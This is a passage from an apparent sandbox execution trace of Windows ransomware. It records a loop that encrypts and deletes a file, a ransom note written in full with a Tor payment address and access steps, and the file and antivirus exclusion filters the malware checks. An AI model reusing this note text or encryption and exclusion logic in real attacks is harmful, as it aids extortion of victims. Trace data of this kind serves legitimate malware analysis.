hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.917] GetLastError () returned 0x0 [0154.917] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.917] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.917] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.917] GetLastError () returned 0x0 [0154.917] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.917] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.917] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.917] GetLastError () returned 0x0 [0154.917] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.918] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.918] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.918] GetLastError () returned 0x0 [0154.918] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.918] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.918] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.918] GetLastError () returned 0x0 [0154.918] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.918] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.918] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.918] GetLastError () returned 0x0 [0154.918] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.918] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.918] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.918] GetLastError () returned 0x0 [0154.918] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.918] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.918] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.918] GetLastError () returned 0x0 [0154.918] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.918] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.918] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.918] GetLastError () returned 0x0 [0154.918] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.919] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.919] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.919] GetLastError () returned 0x0 [0154.919] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.919] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.919] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.919] GetLastError () returned 0x0 [0154.919] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.919] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.919] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.919] GetLastError () returned 0x0 [0154.919] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.919] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.919] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.919] GetLastError () returned 0x0 [0154.919] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.919] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.919] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.919] GetLastError () returned 0x0 [0154.919] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.919] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.919] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.919] GetLastError () returned 0x0 [0154.919] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.919] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.920] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.920] GetLastError () returned 0x0 [0154.920] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.920] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.920] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.920] GetLastError () returned 0x0 [0154.920] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.920] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.920] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.920] GetLastError () returned 0x0 [0154.920] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.920] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.920] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.920] GetLastError () returned 0x0 [0154.920] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.920] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.920] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.920] GetLastError () returned 0x0 [0154.920] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.920] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.920] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.920] GetLastError () returned 0x0 [0154.920] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.920] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.920] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0154.921] GetLastError () returned 0x0 [0154.921] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0154.921] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0154.921] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0154.921] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\tipresx.dll.mui")) returned 0x20 [0154.921] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0154.921] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui") returned 1 [0154.921] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\tipresx.dll.mui")) returned 0 [0154.922] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui" [0154.922] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA") returned 1 [0154.922] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\.xXD050.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\.xxd050.tmp")) returned 0xd050 [0154.922] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\.xXD050.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\.xxd050.tmp"), dwFlags=0x1) returned 0 [0154.922] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\.xXD050.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\.xxd050.tmp")) returned 1 [0154.923] CryptDestroyKey (hKey=0x9ad238) returned 1 [0154.923] wcslen (_String="OK") returned 0x2 [0154.923] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.923] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.923] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0154.923] CryptDestroyHash (hHash=0x9ad678) returned 1 [0154.923] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0154.923] FindNextFileW (in: hFindFile=0x9ad838, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0154.923] GetLastError () returned 0x12 [0154.923] FindClose (in: hFindFile=0x9ad838 | out: hFindFile=0x9ad838) returned 1 [0154.923] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0154.923] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0154.924] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0154.924] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0154.924] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.924] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.924] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0154.924] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.924] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.924] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*.exe") returned 0 [0154.924] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*.dll") returned 0 [0154.924] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*.lnk") returned 0 [0154.924] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*.bat") returned 0 [0154.924] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*.ini") returned 0 [0154.924] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*.msi") returned 0 [0154.924] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*.scf") returned 0 [0154.924] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*pagefile.sys*") returned 0 [0154.924] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*NTUSER.DAT*") returned 0 [0154.924] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*AppData*") returned 0 [0154.924] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*\\winrar\\*") returned 0 [0154.924] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0154.924] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*\\java\\*") returned 0 [0154.924] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0154.924] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*\\windows\\*") returned 0 [0154.925] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*\\ESET\\*") returned 0 [0154.925] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*\\AVG\\*") returned 0 [0154.925] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*\\AVIRA\\*") returned 0 [0154.925] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0154.925] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*Atheros*") returned 0 [0154.925] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*Realtek*") returned 0 [0154.925] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*bootmgr*") returned 0 [0154.925] PathMatchSpecW (pszFile="C:\\Program 